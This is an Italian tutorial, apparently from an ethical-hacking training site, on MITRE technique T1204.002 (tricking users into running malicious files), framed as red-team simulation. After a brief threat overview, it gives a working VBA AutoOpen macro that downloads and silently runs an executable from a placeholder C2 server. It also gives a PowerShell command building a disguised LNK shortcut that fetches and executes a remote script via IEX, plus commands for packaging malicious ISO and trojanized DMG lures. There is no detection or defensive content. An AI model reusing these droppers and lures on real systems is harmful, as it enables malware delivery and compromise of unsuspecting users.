Malicious File: User Execution - Malicious File (T1204.002)

L'esecuzione di file malevoli rappresenta una delle tecniche più diffuse nel panorama delle minacce informatiche moderne. Questa metodologia sfrutta l'interazione diretta dell'utente per avviare codice dannoso mascherato da documenti o software legittimi. La tecnica si posiziona nella fase di Execution (TA0002) della kill chain, manifestandosi tipicamente subito dopo l'accesso iniziale ma potendo emergere anche in fasi successive dell'intrusione.

Con 84 gruppi APT che utilizzano attivamente questa tecnica, 90 famiglie di malware progettate specificamente per sfruttarla e 11 campagne documentate, il fenomeno rappresenta una minaccia concreta per ogni organizzazione. I file malevoli assumono forme diverse: documenti Office con macro, PDF weaponizzati, archivi compressi contenenti eseguibili, file LNK mascherati e persino installer trojanizzati.

Il successo di questa tecnica si basa sulla manipolazione psicologica delle vittime attraverso tecniche di social engineering. Gli attaccanti creano esche convincenti utilizzando tematiche d'attualità, comunicazioni apparentemente legittime o aggiornamenti software urgenti per indurre l'utente ad abilitare le macro o eseguire il file.

Per simulare efficacemente questa tecnica in ambiente controllato, iniziamo con la creazione di un documento Word malevolo. Il processo richiede la costruzione di una macro VBA che scarichi ed esegua un payload secondario:

Sub AutoOpen()
    Dim xHttp: Set xHttp = CreateObject("MSXML2.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "http://[C2-SERVER]/payload.exe", False
    xHttp.Send
    With bStrm
        .Type = 1
        .Open
        .Write xHttp.responseBody
        .SaveToFile Environ("TEMP") & "\update.exe", 2
    End With
    Shell Environ("TEMP") & "\update.exe", vbHide
End Sub

La simulazione di un attacco tramite file LNK richiede PowerShell per la creazione del collegamento malevolo. Questo approccio risulta particolarmente efficace perché i file LNK appaiono come normali collegamenti:

powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\temp\Important_Document.lnk'); $s.TargetPath = 'cmd.exe'; $s.Arguments = '/c powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(''http://[C2]/script.ps1'')'; $s.IconLocation = 'C:\Windows\System32\shell32.dll,1'; $s.Save()"

Per testare la resilienza contro file ISO malevoli, particolarmente utilizzati da gruppi come EXOTIC LILY, possiamo creare un'immagine contenente sia un documento esca che il payload nascosto. Su Linux, il processo diventa:

mkisofs -o malicious.iso -J -r -V "Q3_Reports" /path/to/payload/

L'inserimento di un file LNK all'interno dell'ISO aumenta l'efficacia dell'attacco. Quando l'utente monta l'ISO e clicca sul documento apparentemente legittimo, viene invece eseguito il malware nascosto.

Per simulare attacchi su macOS, sfruttiamo i DMG trojanizzati seguendo le tattiche di OSX/Shlayer. La creazione richiede:

hdiutil create -size 10m -fs HFS+ -volname "Flash_Update" temp.dmg hdiutil attach temp.dmg

Successivamente inseriamo l'applicazione malevola mascherata da installer legittimo, completa di icona convincente per ingannare l'utente.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo